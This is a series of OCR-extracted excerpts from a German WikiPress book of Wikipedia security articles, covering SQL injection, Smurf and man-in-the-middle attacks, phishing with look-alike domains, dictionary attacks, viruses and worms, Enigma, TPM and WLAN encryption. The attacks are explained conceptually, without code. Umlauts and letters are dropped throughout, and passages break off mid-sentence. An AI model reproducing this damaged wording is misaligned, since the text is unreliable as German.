364. kate sind CER DER kodiertes Zertifikat oder Zertifikatsfolgen DER DER kodiertes Zertifikat CRT DER oder Base64 kodiertes Zertifikat PEM Base64 kodiertes Zertifikat umschlossen von P7B P7C PKCS 7 signierte Datenstruktur ohne Dateninhalt nur mit Zertifikat en oder Zertifikatsperrlist en PFX P12 PKCS 12 kann ffentliche Zertifikate und private Schl ssel Kennwort gesch tzt enthalten 151 PGP und Zertfikate PKCS 7 ist ein Standard zum Signieren und Verschl sseln von Daten Da das Zertifkat gebraucht wird um die signierten Daten zu verifizieren kann esin der SignedData Struktur untergebracht werden Eine p7c Datei ist der Speziallfall einer Datei die keine Daten zum Signieren ent h lt sondern nur die SignedData Struktur PKCS 12 entwickelte sicht aus dem PFX Personal inFormation eX change Standard und wird benutzt um ffentliche und private Schl ssel in einer gemeinsamen Datei auszutauschen Eine PEM Datei kann Zertifikate oder private Schl ssel enthalten die von entsprechenden BEGIN END Zeilen umschlossen sind Literatur X 509 Information technology Open Systems Interconnection The Directory Public key and attribute certificate frameworks Quelle http de wikipedia org wiki X 509 Historie 24 10 04 Angelegt von Cljk danach bearbeitet von den Hauptautoren Cljk Wgd Sadduk Steven Malkovich Achim Raschka Nopherox Bluec LetsGetLauth Fuzzy Mijobe Kubieziel Cws
365. knapp 1GBit konfrontiert Dies f hrtjenach Opfer zu einer v lligen Auslastung des Netzwerks oder des Betriebssystems einem berlaufen des Netzwerkstacks oder zum Absturz des Systems Man spricht in diesem Fall auch von einer D DoS Attacke Denial of Service Quelle http de wikipedia org wiki Smurf Attacke Historie 9 11 04 Angelegt von Nightwish62 danach bearbeitet von den Hauptautoren Nightwish62 Quadriat Dickbauch Zumbo 12 1 06 1 2 06 WikiPress Redaktion SQL Injektion SQL Injektion engl SQL Injection bezeichnet das Ausnutzen einer Si cherheitsl cke in Zusammenhang mit SQL Datenbanken Diese entsteht bei mangelnder Maskierung oder berpr fung von Funktionszeichen Der Angreifer versucht ber die Anwendung die den Zugriff auf die Da tenbank bereitstellt eigene Datenbankbefehle einzuschleusen Sein Ziel ist es dabei Kontrolle ber die Datenbank oder den Server zu erhalten Auftreten SQL Injection Bugs treten auf wenn eine Applikation SQL Abfragen an den Server weiterreicht ohne die vom Benutzer eingegebenen Parameter gesondert zu pr fen und etwaig enthaltene Funktionszeichen zu maskie ren und ihnen so die Sonderfunktion zu nehmen Funktionszeichen in 215 Angriffe SQL sind zum Beispiel der umgekehrte Schragstrich der Apostroph oder das Semikolon Diese Zeichen k nnen durch Voranstellen des Maskie rungszeichens einem umgekehrten Schr gstrich als Text gekennzeichnet werden Dieser Vorgang wird
366. konnten Zusammenfassend k nnen folgende Punkte zur kryptografischen St r kung der Enigma festgehalten werden identische Verschl sselung zulassen Involutorik vermeiden mehrere z B elf bertragskerben anbringen bertragskerben f r alle Walzen identisch anordnen mehr als drei Walzen z B acht einbauen Walzensortiment erweitern z B zehn statt f nf Walzenverdrahtung gelegentlich radikal ndern nicht involutorische Stecker verwenden Eine ganz simple Methode die laut Gordon Welchman zu jedem beliebi gen Zeitpunkt leicht h tte eingef hrt werden k nnen ist die Verwendung von einpoligen Steckverbindungen anstelle der doppelpoligen involuto rischen Kabel Dann k nnte man beispielsweise X mit U steckern und U nun aber nicht notwendigerweise mit X sondern mit irgendeinem anderen beliebigen Buchstaben So h tte schlagartig die Involutorik des Stecker bretts und damit der gesamten Maschine beseitigt werden k nnen Dies h tte nach Welchman katastrophale Auswirkungen f r die Codeknacker in Bletchley Park gehabt Ein Gro teil der dort erarbeiteten Methodik inklusive des von Welchman selbst erfundenen diagonal boards w re nutzlos geworden Er schreibt the output of Hut 6 Ultra would have been reduced to at best a delayed dribble as opposed to our up to date flood Andere Rotormaschinen Parallel zu der deutschen Enigma Maschine verwendeten die Amerikaner den TELWA Code die SIGABA Maschine sowie die M 209 Maschi
367. kung Besonders Spammer aus Deutschland und dem Rechtsgebiet der EU k nnen sich nicht mehr in der scheinbaren Anony mit t des WWW verstecken Doch auch international ist der VZBV dank mehrerer Kooperationen t tig Der Vorteil gegen ber Spam Filtern liegt hierbei darin dass die Ver sender von Spam belangt werden Spammen illegalisiert wird und somit langfristig das Versenden von Spam zur ckgeht Der Nachteil ist der dass die Spam Mails vorerst weiter im Postfach landen und das Weiterleiten inklusive des erweiterten Headers zeitaufwendig ist Wichtig w re noch dass auch gerade die Mails weitergeleitet werden die ein Spam Filter be reits aussortiert hat die meisten Mail Dienste haben einen Spam Ver dachtsordner der sich selbstst ndig l scht Ebay PayPal Auch Ebay und PayPal verfolgen nat rlich prim r im eige nen Interesse Spam Versender Diese werden auf Unterlassung verklagt mit dem Ziel dass es keine Spam Mails ber die Firma mehr gibt Ebay und PayPal gehen jedem Hinweis nach und verfolgen die Versender von Spam Mails weltweit Dazu muss man nur Spam Mails die sich f r Ebay bzw PayPal ausgeben bzw darauf berufen mit dem erweiterten Header an folgende Adresse weiterleiten spoof ebay de oder spoof paypal de Man erh lt dann eine Antwort ob die Mail echt war oder nicht sowie allgemeine Informationen zum Thema Mimikry Neben technischen M glichkeiten gibt es noch weitere Me thoden den T ter an der Ausf hrung
368. l der Artikel ist auf grund ihrer Herkunft nicht zu erwarten Es kann Unstimmigkeiten ent 9 halten ebenso vielleicht Fehler und L cken An dieser Stelle sind Sie als A Leser aufgerufen uns zu helfen sei es durch Einsendung der Edit Card berblick am Ende des Buches oder durch aktive Mithilfe in der Wikipedia Liebe Gr e Computersicherheit Michael Diederich Unter Computersicherheit versteht man die Sicherheit eines Computer systems vor Ausfall und Manipulation Datensicherheit sowie vor un erlaubtem Zugriff Datenschutz Unter Computersicherheit werden fol gende Schutzziele zusammengefasst Datenschutz Vertraulichkeit Dateien d rfen nur von autorisierten Benutzern ge lesen werden bertragungssicherheit Die bertragung von einem Rechner zu anderen Rechnern Ger ten oder zum Benutzer kann nicht ausge sp ht werden Privatsph re Pers nlichkeitsdaten bzw Anonymit t m ssen ge wahrt bleiben Datensicherheit Funktionalit t Hardware und Software sollen erwartungsgem funktionieren Integrit t Software und Daten d rfen nicht unbemerkt ver ndert werden Authentizit t Echtheit und Glaubw rdigkeit einer Person oder ei nes Dienstes m ssen berpr fbar sein Verbindlichkeit Urheber von Ver nderungen m ssen erkennbar sein und d rfen Ver nderung nicht abstreiten k nnen Randthemen Nicht Anfechtbarkeit der Nachweis dass eine Nachricht versendet und empfangen worden ist Zugriffssteuerung Reglementi
369. lassen movemail enthielt allerdings eine Schwachstelle die sich bei dieser Konfiguration als verheerend herausstellte Dem Benutzer dessen Mail bewegt wurde war es m glich jede Datei auf dem lokalen System zu lesen und zu schreiben da das Programm ja mit Root Rechten lief Diese schlimme Schw che wurde allerdings erst ffentlich als bereits eine Reihe von Rechnern darunter auch milit risch sensible Anlagen kompromit tiert waren Der sch tzende Patch war gerade einmal drei Zeilen lang Literatur und Filme 23 Nichts ist so wie es scheint Film Amman Thomas Lehnhardt Matthias Mei ner Gerd Stahl Stephan Hacker f r Moskau 1 Auflage Rowohlt Verlag 1989 ISBN 3 8052 0490 6 Hafner Katie Markoff John Cyberpunk Outlaws and Ha ckers on the Computer Frontier ISBN 0 684 81862 0 Schmid Hans Christian Gutmann Michael 23 Die Geschichte des Hackers Karl Koch Das Buch zum Film ISBN 3 423 08477 4 Stoll Clifford Kuckucksei ISBN 3 596 13984 8 226 Man In The Middle Angriff Quelle http de wikipedia org wiki KGB Hack Historie 22 8 03 Angelegt von Echoray danach bearbeitet von den Hauptautoren Echoray Hoch auf einem Baum Hafenbar Joho345 Tom Knox Steven Malkovich Hagbard Stern Lofor Swust Achim Raschka Avatar Tim Pritlove MBq Crux Piefke Naddy anonym 12 1 06 1 2 06 WikiPress Redaktion Man In The Middle Angriff Ein Man In The Middle Angriff ist eine Angriffsform welche in Com
370. le http de wikipedia org wiki Kopierschutz Historie 12 8 03 Angelegt von Carter666 danach bearbeitet von den Hauptautoren Keimzelle Carter666 Metoc Suricata LostSoul IP X Kris Kaiser Tody Asb Mega Tischlampe Ernesto Wikizen Amaryllis klitzekleine Schwester Steven Malkovich Fgb Nameless Mathias Schindler Dishayloo Achim Raschka Verw stung Faraway PaulchenP RobertLechner anonym 12 1 06 1 2 06 WikiPress Redaktion Trusted Computing Platform Alliance Die Trusted Computing Platform Alliance TCPA ist ein Konsortium das 1999 von Microsoft IBM Hewlett Packard und Compaq gegr ndet wur de Bis zum April des Jahres 2003 geh rten ihr etwa 200 Firmen aus dem Hardware und Softwarebereich an Ziel war die Schaffung eines Indus triestandards um Manipulationssicherheit von Daten und Programmen 122 Trusted Computing Group auf dem PC zu erreichen Die damit verwirklichten Eigenschaften lassen sich auch f r digitale Rechteverwaltung Digital Rights Management oft f lschlich als digitaler Urheberrechtsschutz bezeichnet nutzen was von den TCPA Mitgliedern jedoch nur als Nebenprodukt der Spezifikati on gesehen wird Aufgrund des Veto Rechts aller 200 Mitglieder erwies sich die TCPA als nicht handlungsf hig Als Konsequenz wurde im April 2003 die offi zielle Nachfolgeorganisation Trusted Computing Group TCG gegr n det die die bis dahin geschaffenen Spezifikationen bernahm und ihre Weiterentwicklung
371. lePubekRead blockiert werden Die Blockierung ist endg ltig und kann nicht mehr aufgehoben werden Attestation Identity Keys AIK Da der EK das TPM nie verl sst wer den aufihm basierende Attestation Identity Keys AIK eingesetzt um die eigentlichen Funktionalit ten nach au en sicherzustellen Die Erzeugung der AIKs wird vom Benutzer angesto en ihre Anzahl ist theoretisch un begrenzt Die Schl ssell nge ist hier ebenfalls auf 2048 Bit unter Verwen dungs des RSA Verfahrens festgesetzt Die AIKS sind migrierbar Storage Root Key SRK Ebenfalls migrierbar ist der Storage Root Key SRK ein RSA Schl sselpaar mit 2048 Bit Er dient allein dem Zweck weitere benutzte Schl ssel z B private Schl ssel zur E Mail Kommuni kation eines Benutzers mit dem ffentlichen Teil zu verschl sseln somit stellt er die Wurzel des Schl sselbaumes dar Wechselt der Besitzer des Rechners wird ein neuer SRK erzeugt 117 Software Leistungen des TPM Versiegelung sealing Durch Bilden eines Hash Wertes aus der Sys tem Konfiguration Hard und Software k nnen Daten an ein einziges TPM gebunden werden Hierbei werden die Daten mit diesem Hash Wert verschl sselt Eine Entschl sselung gelingt nur wenn der gleiche Hash Wert wieder ermittelt wird was nur auf dem gleichen System gelingen kann Bei Defekt des TPM muss nach Aussagen von Intel die Anwen dung die Sealing Funktionen nutzt daf r sorgen dass die Daten nicht verloren si
372. leiche Aussehen wie die Originalseiten Sie sind also nur sehr schwer als F lschungen iden tifizierbar Im Allgemeinen sollte der Anwender die originalen Internet Seitenadressen z B seiner Bank kennen Die Adresszeile des Webbrowsers verr t falls er sich nicht auf der Originalwebsite befindet Eine Adresszeile http 217 257 123 67 security verr t z B eindeutig dass man sich nicht auf den Seiten einer Bank befindet Deshalb werden Domainnamen Internet Adressnamen benutzt die den Bankadressen t u schend hnlich sehen z B http www security beispielbank de Mit der M glichkeit Umlaute in URLs zu verwenden entstanden neue M glichkeiten der Adress Namensverf lschung Beispielsweise k nn te eine Originaladresse lauten http www roemerbank de Bank frei erfunden und als F lschung http www r merbank de Die zwei Na men sind sachlich identisch allerdings technisch unterschiedlich denn sie werden im Hintergrund zu unterschiedlichen Adressen aufgel st und k nnen zu v llig unterschiedlichen Websites f hren Noch schwerer zu erkennen ist die Verwendung von kyrillischen Buch staben anstelle von Umlauten Das kyrillische a unterscheidet sich op 231 Angriffe tisch in keiner Weise vom lateinischen a Falls das a in http www beispielbank de also kyrillisch dargestellt wird ist die Adresse unter schiedlich und somit falsch Allerdings zeigt die Adresszeile des Browsers keinen sichtbaren U
373. ler Hanno Behrens Merren Achim Raschka Kku Hedavid Fang Ling Su Stern Urizen Eike sauer Tsor Priwo anonym 12 1 06 1 2 06 WikiPress Redaktion Worterbuchangriff Als einen W rterbuchangriff engl dictionary attack bezeichnet man die Methode der Kryptoanalyse ein unbekanntes Kennwort oder Benut zernamen mit Hilfe einer Passwortliste zu knacken Man verwendet diese Methode wenn man davon ausgehen kann dass das Passwort aus einer sinnvollen Zeichenkombination besteht Dies ist erfahrungsgem meistens der Fall Erfolgversprechend ist dieses Ver fahren nur wenn m glichst viele Passworte schnell hintereinander aus probiert werden k nnen M gliche Angriffsziele Dazu unterscheidet man aktive und passive Angriffsobjekte Ein aktives Angriffsobjekt ist eine Instanz welche die Richtigkeit des Passwortes berpr ft und den Zugriff erteilt oder verweigert Dies ist beispielsweise beim Einloggen auf einer Webseite der Fall Bei aktiven Angriffsobjekten sind die M glichkeiten der W rterbuchattacke stark 293 Kryptografie begrenzt da h ufig nach einer gewissen Anzahl von Fehlversuchen jeder weitere Versuch unterbunden wird hnlich der PIN am Geldautomaten die maximal drei Mal falsch eingegeben werden kann Au erdem hinter l sst der Angreifer Spuren in den Protokolldateien des Servers Unter einem passiven Angriffsobjekt versteht man einen verschl ssel ten Text Hier wird das Passwort nicht durch eine
374. les of transparent image formats include PNG XCF and JPG Opaque formats include proprietary formats that can be read and edited only by proprietary word processors SGML or XML for which the DTD and or processing tools are not generally available and the machine generated HTML PostScript or PDF produced by some word processors for output purposes only The Title Page means for a printed book the title page itself plus such following pages as are needed to hold legibly the material this License requires to appear in the title page For works in formats which do not have any 327 Anhang title page as such Title Page means the text near the most prominent appearance of the work s title preceding the beginning of the body of the text A section Entitled XYZ means a named subunit of the Document whose title either is precisely XYZ or contains XYZ in parentheses following text that translates XYZ in another language Here XYZ stands for a specific section name mentioned below such as Acknowledgements Dedications Endorsements or History To Preserve the Title of such a section when you modify the Document means that it remains a section Entitled XYZ according to this definition The Document may include Warranty Disclaimers next to the notice which states that this License applies to the Document These Warranty Disclaimers are considered to be included by reference in this License but only as regards disclaiming wa
375. ley Park war der britische Mathe matiker Alan Turing dessen Arbeiten f r die Informatik auch heute noch wegweisend sind Turing lieferte wichtige Entwurfsideen f r die englische Variante der bomba Die technische Grundidee war in etwa folgende Angenommen auf grund eines cribs known plaintext Attacke ergibt sich eine 3 Buchstaben Schleife plaintext a auf ciphertext b b auf c und c wieder auf a Das hei t in kurzem Abstand a b c a W rde man nun drei Enigmas unter Auslassung des Steckerfeldes in der originalen Rotorposition hintereinanderschalten so erhielte man auch eine physikalische Leiterschleife insbesondere f r den Fall der bereinstimmenden Rotorstellungen die man detektieren kann in dem man etwa Lampen an die anderen Rotorkontakte anschlie t In diesem Fall ergibt sich die Verschaltung des Steckerfeldes als L sung wenn man die 17 000 Permutationen synchron durchlaufen l sst Leider ist die Zuordnung nicht eindeutig aber der L sungsraum wird bereits recht klein Den Alliierten gelang es am 4 Mai 1941 das deutsche U Boot U 110 zu bernehmen und eine Enigma M3 sowie zahlreiche Codetabellen zu erbeuten Da die deutsche Besatzung vorher das schwer besch digte U Boot verlassen hatte von dem Zerst rer HMS Bulldog aufgefischt und sofort unter Deck gebracht wurde blieb den Deutschen diese Eroberung 311 Kryptografie unbekannt Im Juni 1944 konnten eine weitere Enigma Maschine sowie die geheimen Schl sselunterla
376. lgemeinen ist dies das ffnen der ihm zugesandten Schadsoftware Allerdings gibt es auch W rmer welche nicht von der Mitwirkung des Opfers abh ngig sind Sie nutzen Techniken die ihre Aktivierung auf dem Rechner des Opfers auto matisch veranlassen Da dies grunds tzlich nicht m glich sein sollte f llt dies unter die Kategorie Ausnutzen von Sicherheitsl cken Der Wurm W32 Blaster nutzt einen Remote Exploit in der RPC DCOM Schnittstelle von Windows 2000 und XP Das bedeutet er nutzt eine Sicher heitsl cke aus engl to exploit um Rechner ber Netzwerke zu infizieren Nach einer Infektion beginnt er wahllos Netze also z B das Internet nach weiteren Rechnern mit dieser Sicherheitsl cke abzusuchen um sie unverz glich ebenfalls zu infizieren siehe im Abschnitt Geschichte in diesem Artikel Neben Sicherheitsl cken des Betriebssystems k nnen auch Sicherheits l cken in Anwendungssoftware Einfallstore f r W rmer bieten Eine Reihe von W rmern nutzt einen Fehler in der JavaScript Implementie rung des bekannten E Mail Programms Microsoft Outlook Express Die Anlagen von HTML E Mails welche mit speziellem Javascript Code ausgestattet waren wurden von Outlook Express ohne Zutun des Be 52 Computerwurm nutzers ge ffnet und somit der Rechner infiziert Allein das Betrachten des E Mail Textes startete also ohne weiteres Zutun des Anwenders die Schadsoftware Der Fehler lag in der Bibliotheksdatei mshtml dll di
377. lheit oder bei unbekannten Kombattanten Freund und Feind zu unterscheiden Noch heute wird von nachtpatrouillierenden Soldaten auf Man ver die Frage nach der Parole gestellt Im Mittelalter wurde manche Burgbelage rung durch den Verrat des Losungswortes entschieden PIN Die PIN Pers nliche Identifikationsnummer ist eine andere Form des Kennwortes mit einer ausschlie lich numerischen Zeichenfolge die nicht immer vom Benutzer frei w hlbar ist und z B beim Geldabheben an Bankautomaten Verwendung findet Einsatz von Kennw rtern H ufiger Einsatz von Kennw rtern findet in der Computerwelt in Verbin dung mit einem Benutzer oder Usernamen statt z B bei Wikipedia Hier ist das Kennwort eine beliebige vom Nutzer selbstgew hlte alphanume rische Zeichenfolge Einen Sonderfall stellt das so genannte Einmalpass wort dar bei dem jedes Passwort nur einmal zur Authentisierung benutzt wird und dann ung ltig wird Diesem Vorgehen wird eine besonders hohe Sicherheit zugesprochen Es entsteht kein Schaden wenn ein Passwort w hrend der Benutzung ausgesp ht wird denn danach ist es ja ung ltig Einmalpassw rter werden zum Beispiel f r das PIN TAN Verfahren beim Online Banking verwendet Kennw rter werden au erdem im Bereich der Kindersicherung verwendet um Kindern den Zugriff auf Fernseher Receiver oder ungeeignete Programminhalte zu verwehren Sichere Kennw rter f r die Verschl sselung Moderne Verschl sselungsverfahren sind extrem
378. lich Peter Carl der sich in notorischen Geldsorgen befindet und in den F higkeiten der beiden eine M glichkeit zum Geldverdienen sieht Die Idee ihre Entdeckungen auf den gehackten Rechnern an den KGB zu verkaufen stammt von Pedro Gemeinsam fah ren die drei zur russischen Botschaft nach Ost Berlin um sich dem KGB anzubieten Nachdem man sie dort wegen ihres Anliegens ausgelacht und 224 KGB Hack fast weggeschickt hat ist doch noch ein Mitarbeiter der Ost Berliner KGB Residenz mit dem Namen Sergej bereit ihnen zuzuh ren Die Hacker sol len zun chst einmal Testmaterial liefern um dem KGB zu beweisen dass sie es ernst meinen und etwas k nnen Ein Jahr lang hacken sich Koch DOB und andere Hacker die nicht unbedingt ber die KGB Verbindung und die Geldfl sse seitens des KGB informiert sind in verschiedene Rech ner von Firmen und Organisationen in Deutschland und der ganzen Welt ein Pedro wird der Mittelsmann zwischen den Hackern und dem KGB er liefert die Ergebnisse nach Ost Berlin und bringt von dort Geld insge samt mehrere zehntausend DM und neue Auftr ge des KGB mit Im April 1986 kommt es zur Atomreaktor Explosion von Tschernobyl Karl Koch zu diesem Zeitpunkt schon lange schwer drogenabh ngig und in einem oft zweifelhaften geistigen Zustand sieht dies als unmittelbare Folge eines seiner Hacks an da er kurz vorher in den Rechner eines Atom kraftwerks eingedrungen war Sein Zustand verschlechtert sich so weit dass
379. liertes Programm sondern als von einem Interpreter abzuarbeitender Code vorliegen Die berwiegende Mehrzahl verwendet dazu Microsofts imperative Makro sprachen VBA oder VBS Da VBA und VBS direkt auf die Manipulation von Dateien zielen ist das Gefahrenpotenzial von Makroviren entspre chend hoch Besonders gef hrlich sind diese Viren auch deshalb weil die Makrosprache leicht zu erlernen ist Einen gewissen Schutz bieten aktuelle Antivirenprogramme sowie Vorsicht beim Datenaustausch Angegriffen werden u a folgende Pro gramme Microsoft Word Microsoft Excel Microsoft PowerPoint Mic rosoft Access AmiPro und CorelDraw Quelle http de wikipedia org wiki Makrovirus Historie 7 3 04 Anonym angelegt danach bearbeitet von den Hauptautoren Igelball Reniar Mario23 D235 anonym 12 1 06 1 2 06 WikiPress Redaktion TSR Virus TSR Viren engl Terminate and Stay Resident sind Computerviren Der TSR Virus bef llt ausf hrbare Dateien und bleibt nach deren Start im Hauptspeicher des Rechners aktiv bis er ausgeschaltet wird und infiziert von dort aus alle ausf hrbaren Programme die danach gestartet werden In der Regel sind COM und EXE Dateien Ziel der Viren es k nnen u U auch Ger tetreiber davon betroffen sein 47 Viren W rmer Trojaner Damit eine Verbreitung der Viren stattfinden kann muss ein infiziertes Programm ausgef hrt werden Dadurch wird der Virus speicherresident und infiziert im Normalfall jedes nach ih
380. lle diese Daten und vor allem beide Fingerprints berein si gniert er den ffentlichen Schl ssel von Alice mit seinem privaten und schickt diese Signatur wieder an den Keyserver M chte jetzt Carl mit Alice verschl sselt kommunizieren besorgt er sich genau wie Bob Alices ffentlichen Schl ssel vom Keyserver Dann stellt er fest dass Bob Alices Schl ssel bereits berpr ft hat Wenn Carl Bobs Schl ssel schon kennt und Bob vertraut dass er vor der Signa tur fremder Schl ssel eine gr ndliche berpr fung durchf hrt dann muss er nicht erst Alice treffen und diese Pr fung wiederholen Formalisierung Die Schl sselverwaltung in einem Web of Trust erfolgt mit Hilfe von Keyrings Im Public Keyring eines Benutzers werden eigene und fremde ffentliche Schl ssel und zugeh rige Zertifikate gespeichert der Private Keyring enth lt eigene private Schl ssel Den ffentlichen Schl sseln ord net jeder Benutzer Vertrauen in dessen Besitzer zu Owner Trust Daraus wird der Grad des Vertrauens in die Authentizit t anderer Schl ssel Key Legitimacy und in die Signaturen anderer Benutzer Signatory Trust ab geleitet Vertrauen in die Echtheit fremder Schl ssel wird entweder ber Direct Trust also die pers nliche berpr fung der Authentizit t des Pu blic Keys eines anderen Benutzers oder ber den Owner Trust der Signie rer der fremden Schl ssel etabliert Owner Trust Den Wert f r Owner Trust legt jeder Benutzer f r alle
381. lligt hat Die konkrete Umsetzung in das jewei lige nationale Recht ist in den jeweiligen L ndern unterschiedlich Eine bersicht dazu liefert die Dissertation von Bj rn Bahlmann M glich keiten und Grenzen der rechtlichen Kontrolle unverlangt zugesandter E Mail Werbung Internationale Regelungen und alternative L sungsm g lichkeiten die nur direkt beim Verlag erh ltlich ist In sterreich war von 1999 bis 2003 f r das Versenden von Massen oder Werbe E Mail nach 101 Telekommunikationsgesetz TKG 1997 die vorherige Zustimmung des Empf ngers erforderlich opt in UCE und UBE somit verboten Die Nachfolgeregelung 107 TKG 2003 erlaubt UCE an Unternehmen oder Beh rden mit Einschr nkungen auch an bestehende Privatkunden wenn diese weitere Nachrichten ab lehnen k nnen opt out Massen oder Werbe E Mail an Privatper sonen bedarf weiterhin der vorherigen Zustimmung des Empf ngers opt in Zuwiderhandlungen werden von der Fernmeldebeh rde mit bis zu 37 000 Euro bestraft allerdings ist nur eine Verfolgung ster reichischer oder deutscher T ter erfolgversprechend Unabh ngig davon besteht die M glichkeit einer Klage durch den Empf nger auf Unterlassung oder durch einen Mitbewerber wegen unlauteren Wett bewerbs In den USA wurde Spam durch den CAN SPAM Act im Prinzip ver boten Mittlerweile wurden die ersten Spammer bereits verhaftet 2004 wurde in den USA ein Spammer zu einer Haftstrafe von 9 Jahren verur teilt
382. llst ndige Handbuch ber die rasant wachsende freie Online Enzy klop die Es informiert ausf hrlich ber die Hintergr nde und enth lt einen umfassenden Referenzteil Alle Texte wurden von erfahrenen Wikipedianern zusammengestellt und zeigen auch Neulingen den weg ineine neue enzyklop dische ra Wikipedia das Buch gibt somit auch einen Anreiz sich in dem offenen Projekt zu engagieren Sonnensystem Das Sonnensystem fasziniert die Menschen bereits seit Zehntausenden von Jahren Aus diesen Zeiten stammen die ersten Beobach ungen der erdnahen Planeten des Erdmondes und der Sonne selbst Die Positionen dieser Himmelsk rper waren bis in die vergangenen Jahrhunderte umstritten Gerade in den letzten Jahrzehnten wurde eine ungeheure F lle an In ormationen zu den Planeten und Monden ge wonnen Immer bessere Teleskope und Raum sonden bieten ein immer detaillierteres Bild des Sonnensystems und seiner Planeten Monde Asteroiden und Kometen Dieses Buch stellt diese neuen Erkenntnisse ber die Himmelsk r per umfassend dar Sonnensystem Fakten Geschichte Erforschung WikiPress 6 ISBN 3 86640 006 3 9 90 F r er Die F r er geh ren f r uns zu den unbekann esten Regionen Europas Die im Mittelalter entdeckte und besiedelte Inselgruppe ist wie Gr nland eine gleichberechtigte Nation inner halb des K nigreichs D nemark Sie liegt im ordatlantik zwischen den britischen Inse
383. ln orwegen und Island und hat durch ihre Abge schiedenheit eine ganz eigene Kultur mit vielf l igen Besonderheiten entwickelt Dieses Buch soll dem Leser die F r er mit all ihren Facetten n herbringen Es enth lt detaillierte geographi sche Beschreibungen Episoden der fardischen Geschichte und Portr ts fardischer Pers nlich keiten F r er Geographie Geschichte Kultur WikiPress 2 ISBN 3 86640 002 0 9 90 nklopsdie Wikipedia elft von Daniel Arnold mew Aus dr freien En PRESS opadie Wikipedia wilt von Arne List Friedensnobelpreistr ger Dieses Buch ber s mtliche Friedensnobelpreis r ger seit 1901 liest sich wie eine Geschichte der Konflikte und Krisen des 20 und 21 Jahr hunderts Martin Luther Kings riskanter Kampf gegen den Rassismus Willy Brandts mutiges Eintreten f r eine entspannte Ostpolititk oder amnesty internationals anhaltendes Engage ment f r die Einhaltung der Menschenrechte Die Geschichte des Friedensnobelpreises ist reich an Beispielen interessanter Biographien und Hintergrundberichte im Spannungsfeld der gro en globalen Themen der Zeitgeschichte Friedensnobelpreistr ger Geschichte Personen Organisationen WikiPress 10 ISBN 3 86640 010 1 9 90 Robben Robben bestechen durch ihr niedliches Aus sehen und wecken den Besch tzerinstink des Menschen au erdem sind sie aufgrund ihrer Lebensweise im Meer geheimnisvoll und spannen
384. lze rotierte und erst dann eine Fortschaltung auf den mittleren Ro tor passierte F r relativ lange Textpassagen besteht die Enigma somit aus Sicht des Kryptanalysten nur aus einer einzigen sich drehenden rechten 314 Enigma Walze und einer aus mittlerer und linker Walze sowie der Umkehrwalze bestehenden sozusagen besonders dicken feststehenden Umkehrwalze Erst der bertrag auf die mittlere Walze st rt dies Dieses wichtige Er eignis hatte bei den Codeknackern in Bletchley Park sogar einen Spitz namen Sie nannten es crab engl f r Krabbe und das noch seltenere Fortschalten der linken Walze hie lobster engl f r Hummer H tten die Walzen der Enigma ber mehr als nur eine einzige bertragskerbe verf gt beispielsweise elf so w re die Kryptanalyse durch h ufige crabs und lobsters stark gest rt worden Vielleicht f rchteten die Konstrukteure der Enigma eine Reduzierung der Periode das ist die Anzahl der Zeichen nach der sich das zur Ver schl sselung verwendete Alphabet wiederholt Die Periode betr gt bei der Enigma I 16 900 Bei Verwendung von zwei vier oder gar dreizehn ber tragskerben statt nur einer w rde sie tats chlich absinken da diese Zah len gemeinsame Teiler mit 26 aufweisen Bei drei f nf sieben neun oder elf Kerben hingegen besteht diese Gefahr nicht da sie zu 26 teilerfremd sind Interessanterweise wurden bei der Marine in Erg nzung zu den von der Enigma I bekannten f nf Walzen
385. m gliche Fehlerquellen zu minimieren Eine andere Meinung ist dass man WEP nutzen sollte um die OSI Schicht 2 wenigstens minimal abzusichern Quelle http de wikipedia org wiki Wired_Equivalent_Privacy Historie 12 2 03 Anonym angelegt danach bearbeitet von den Hauptautoren Djoser LudiKalell Cljk Hamsta Baikonur Fabian Bieker Nachdenklicher Inode Stern Jed Dick Tracy Iblue Achim Raschka M rossberg Wolfgang1018 Ulf Wetzker Hoch auf einem Baum MichiK Botteler JustinSane anonym 12 1 06 1 2 06 WikiPress Redaktion Wi Fi Protected Access Wi Fi Protected Access WPA ist eine Verschl sselungsmethode f r ein Wireless LAN Nachdem sich die Wired Equivalent Privacy WEP des IEEE Standards 802 11 als unsicher erwiesen hatte und sich die Verab schiedung des neuen Sicherheitsstandards IEEE 802 11i verz gerte wurde durch die Wi Fi eine Teilmenge von IEEE 802 11i vorweggenommen und unter dem Begriff WPA als Pseudostandard etabliert WPA enthalt die Architektur von WEP bringt jedoch zusatzlichen Schutz durch dynamische Schliissel die auf dem Temporal Key Integrity Protocol TKIP basieren und bietet zur Authentifizierung von Nutzern Pre Shared Keys PSK oder Extensible Authentication Protocol EAP uber IEEE 802 1x an 251 WLAN WPA basiert auf dem RC4 Stromchiffre welcher schon f r WEP genutzt wurde Im Gegensatz zu WEP nutzt WPA nicht nur einen 24 Bit langen IV Initialisierungsvektor sondern auch e
386. m ausgef hrte Programm falls das noch nicht geschehen ist TSR Viren k nnen von sich aus z B Prozessaufrufe abfangen externe Speichermedien manipulieren und noch viel erheblichere Sch den im Sys tem verursachen ohne dass der Benutzer irgendeine Aktion ausgel st hat Unter idealen Bedingungen kann ein TSR Virus sogar eine Formatierung der Festplatte berstehen TSR Viren k nnen sich ber die verschiedenen BIOS Interrupts Zu griff auf die Festplatte verschaffen und alle Schreibversuche dahingehend berpr fen ob der eigene Speicherbereich im Master Boot Record ber schrieben werden soll Dies verhindern sie oder schreiben nach erfolgtem berschreiben den eigenen MBR wieder zur ck Sie k nnen au erdem die Tastatureingabe berwachen und Zeichenfolgen wie Login und Passwort abspeichern Wenn der Eindringling sp ter diese Datei mit den erbeuteten Zugangskennungen abholt kann er leicht in das System eindringen Quelle http de wikipedia org wiki TSR Virus Historie 23 11 04 Angelegt von CSonic danach bearbeitet von den Hauptautoren CSonic MichaelDiederich BWBot anonym 12 1 06 1 2 06 WikiPress Redaktion Handyvirus Ein Handyvirus ist eine nicht selbstst ndige Programmroutine die ih ren Code in andere Handyprogramme oder in das Handy Betriebssystem einschleust und sich damit selbst reproduziert Einmal gestartet nimmt sie vom Anwender nicht kontrollierbare Ver nderungen am Status der Handyhardware am Betriebssystem
